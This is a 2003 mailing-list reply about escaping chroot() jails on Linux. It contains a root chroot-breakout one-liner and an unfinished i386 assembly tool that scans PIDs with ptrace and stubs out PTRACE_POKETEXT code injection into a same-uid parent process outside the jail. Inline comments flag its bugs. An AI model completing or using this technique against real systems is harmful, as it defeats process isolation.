Re: exiting chroot()

From: Felipe Cerqueira (skylazart) (skylazart_at_core.cx)
Date: 12/20/03


Date: Sat, 20 Dec 2003 17:41:08 -0200


- skylazart
http://core.cx/skylazart
mailto: skylazart!core.cx

On Sat, 20 Dec 2003, Pieter Droogendijk wrote:

> begin on Mon, 15 Dec 2003 22:20:29 -0200, "Felipe Cerqueira (skylazart)"
> <skylazart@core.cx> wrote:
>
> > its really true.. but, if you can attach in parent process with the child
> > (using ptrace), you could inject the code and break out chroot protection...
> > (existing vulnerabilities like bufferoverflows etc..)
>
> Only root can ptrace another process. See below.

No, that's not true. If you have two processes — a parent and a child, for example — both running as the same unprivileged user, and the child chroots itself, the child can ptrace-attach to the parent (which still lives outside the jail) and inject arbitrary code there. Unprivileged ptrace only requires matching uids, not root (at least on the kernels of the time; newer kernels can restrict same-uid ptrace further, e.g. via Yama's ptrace_scope).

>
> > so, a important thing to do is change the owner of child process with an
> > unprivileged user.
>
> That's what you should ALWAYS do after chroot()ing. Root can break out of a
> chroot() jail, no problem {int i=255;while (i--) chdir (".."),chroot (".");}
> If you chroot as root, you're just delaying the inevitable.

That's the same thing I said, just in other words.

I'm using this code to break out (Linux/i386, GAS AT&T syntax, raw int $0x80 syscalls):

.include "syscalls.asm"

.text
.globl main
.align 4

# int main(void)
# Linux/i386, int $0x80 syscall ABI: eax = syscall number, ebx/ecx/edx/esi = args,
# result in eax. The code relies on int $0x80 leaving every other register intact
# (ecx is reused as a pointer right after the getpid syscall below).
#
# Probes PIDs 100..100000: every pid other than our own is PTRACE_ATTACHed and,
# if that succeeded, PTRACE_DETACHed again right away. Afterwards
# ptrace_writedata is called with only its length argument loaded.
#
# Frame (20 bytes below ebp):
#   -4(%ebp)   scratch slot (not written by main itself)
#   -8(%ebp)   pid currently being probed (loop counter)
#  -12(%ebp)   our own pid, so we skip ourselves
#
# NOTE(review): ebx, esi and edi are callee-saved in the i386 SysV ABI and are
# clobbered here (and inside the helpers) without being saved and restored.
main:
        pushl %ebp
        movl %esp, %ebp

        subl $20, %esp                  # locals, see frame layout above

        leal -12(%ebp), %ecx
        movl $SYS_getpid, %eax
        int $0x80
        movl %eax, (%ecx)               # -12(%ebp) = getpid()

        leal -8(%ebp), %ecx
        movl $100, (%ecx)               # start probing at pid 100

L2:
        nop                             # no-op
        movl -12(%ebp), %eax            # eax = our pid
        movl -8(%ebp), %ebx             # ebx = candidate pid
        cmpl %eax, %ebx
        je L3 # skipping myself

        movl -8(%ebp), %ebx             # ptrace_attach(pid in ebx) -> eax = -1 on failure
        call ptrace_attach
        cmpl $-1, %eax
        je L3 # attach failed

        movl -8(%ebp), %ebx             # attached: release it again, ptrace_detach(pid in ebx)
        call ptrace_detach

L3:
        leal -8(%ebp), %ecx
        addl $1, (%ecx)                 # next pid
        cmpl $100000, (%ecx)
        jle L2                          # signed compare is fine for this fixed range
                        # loop finished

        movl $10, %edi                  # length = 10
        call ptrace_writedata           # NOTE(review): ebx (pid), ecx (addr) and edx (ptr)
                                        # are not loaded here -- this call is the
                                        # unfinished part the author mentions

        addl $20, %esp

        xorl %eax, %eax                 # return 0
        popl %ebp
        ret

###############################
## exit ();
## Args: ebx -> status
## Invokes SYS_exit directly (ebx is already the status argument in the
## int $0x80 ABI) and therefore never returns. Not called from the code
## shown in this listing; main returns to its caller instead.

exit:
        movl $SYS_exit, %eax
        int $0x80

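###############################
## ptrace_attach ();
## Args: ebx -> pid
## Does ptrace(PTRACE_ATTACH, pid, 0, 0) and then waitpid(pid, &status, WUNTRACED)
## until WIFSTOPPED(status), i.e. until the tracee has actually stopped.
## Returns: eax = waitpid's result (the pid, > 0) on success,
##          -1 if the attach failed or any waitpid failed (the raw syscall
##          returns -errno). On a waitpid failure the attach is not undone.
## Clobbers: eax, ebx, ecx, edx, esi, flags. Uses 4 bytes of its own stack for
##           the status word, so it no longer depends on the caller's frame.
ptrace_attach:
        movl %ebx, %ecx                 # arg2 = pid
        movl $PTRACE_ATTACH, %ebx       # arg1 = request
        xorl %edx, %edx                 # arg3 = addr, unused
        xorl %esi, %esi                 # arg4 = data, unused
        movl $SYS_ptrace, %eax
        int $0x80
        testl %eax, %eax
        jnz L0                          # -errno: not permitted, no such pid, ...

        movl %ecx, %ebx                 # ebx = pid; must stay intact across every
                                        # waitpid retry below (ecx/edx get reused)
        subl $4, %esp                   # int status at (%esp)

# do until WIFSTOPPED (status)
L0_1:
        movl $SYS_waitpid, %eax
        movl %esp, %ecx                 # arg2 = &status
        movl $WUNTRACED, %edx           # arg3 = options
        int $0x80
        testl %eax, %eax
        js L0_2                         # waitpid failed (tracee gone, EINTR, ...):
                                        # give up instead of spinning forever
        movl (%esp), %edx
        andl $0xff, %edx
        cmpl $0x7f, %edx                # WIFSTOPPED(status): low byte == 0x7f
        jne L0_1                        # something else happened, keep waiting

        addl $4, %esp
        ret                             # eax = pid returned by waitpid

# waitpid(pid) failed after a successful attach
L0_2:
        addl $4, %esp
# ptrace_attach (pid) failed
L0:
        movl $-1, %eax
        ret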

###############################
## ptrace_detach ();
## Args: ebx -> pid
## Issues ptrace(PTRACE_DETACH, pid, 0, 0) through int $0x80.
## Returns: eax = 0 on success, -1 if the syscall failed (raw result is -errno).
## Clobbers: eax, ebx, ecx, edx, esi, flags.

ptrace_detach:
        movl %ebx, %ecx                 # arg2 = pid
        movl $PTRACE_DETACH, %ebx       # arg1 = request
        xorl %edx, %edx                 # arg3 = addr, unused
        xorl %esi, %esi                 # arg4 = data, zero
        movl $SYS_ptrace, %eax
        int $0x80

        # Fold the 0 / -errno result into the 0 / -1 contract without a branch:
        # eax != 0 -> al = 1 -> eax = 1 -> eax = -1 ; eax == 0 stays 0.
        testl %eax, %eax
        setnz %al
        movzbl %al, %eax
        negl %eax
        ret
###############################
## ptrace_writedata ();
## Args: ebx -> pid,
## ecx -> addr,
## edx -> *ptr,
## edi -> length
##
## Intended (per the header above) to copy `length` bytes from *ptr into the
## tracee at addr with PTRACE_POKETEXT, one 4-byte word per call. As written it
## is a stub -- the author says the listing is unfinished -- with these problems:
## NOTE(review): `movl %esp, %ebx` overwrites the pid argument with the stack
##   pointer and never re-bases %ebp, so -4(%ebp)/-8(%ebp) below address the
##   caller's frame, not this function's. Presumably meant to be `movl %esp, %ebp`.
## NOTE(review): the loop body loads eax/ebx for the syscall but never executes
##   `int $0x80`, and addr / *ptr are never advanced or passed.
## NOTE(review): `cmpl %eax, %ebx ; jle L4` loops while length <= offset, which
##   looks inverted (for length 10 the body runs once; for length <= 4 it never
##   terminates) -- confirm the intended condition before finishing it.

ptrace_writedata:

        pushl %ebp
        movl %esp, %ebx                 # NOTE(review): clobbers pid, ebp not updated (see above)

        subl $16, %esp                  # 16 bytes reserved, addressed via the caller's ebp

        movl %ebx, %ecx # NOTE(review): ecx now holds the old %esp, not the pid
                                # initializing the local vars
        leal -4(%ebp), %eax # counter (displacement) -4(%ebp)
        movl $0, (%eax)
        leal -8(%ebp), %eax
        movl %edi, (%eax) # saving length -8(%ebp)

L4:
        movl $SYS_ptrace, %eax          # syscall number and request are set up ...
        movl $PTRACE_POKETEXT, %ebx     # ... but no int $0x80 follows

        leal -4(%ebp), %eax
        addl $4, (%eax)                 # offset += 4 (one word per POKETEXT)

        movl -4(%ebp), %eax             # eax = offset
        movl -8(%ebp), %ebx             # ebx = length
        cmpl %eax, %ebx
        jle L4                          # loops while length <= offset (see note above)

        addl $16, %esp
        pop %ebp
        ret

It's not really finished yet: main never loads the pid/addr/ptr arguments for ptrace_writedata, and ptrace_writedata itself does not issue the PTRACE_POKETEXT call. You can finish it yourself.

>
> --
> begin signature:
> char*x(c,k,s)char*k,*s;{if(!k)return*s-36?x(0,0,s+1):s;if(s)if(*s)c=10+(c?(x(
> c,k,0),x(c,k+=*s-c,s+1),*k):(x(*s,k,s+1),0));else c=10;printf(&x(~0,0,k)[c-~-
> c+"1"[~c<-c]],c);}main(){x(0,"^[kXc6]dn_eaoh$%c","-34*1'.+(,03#;+,)/'///*");}
>


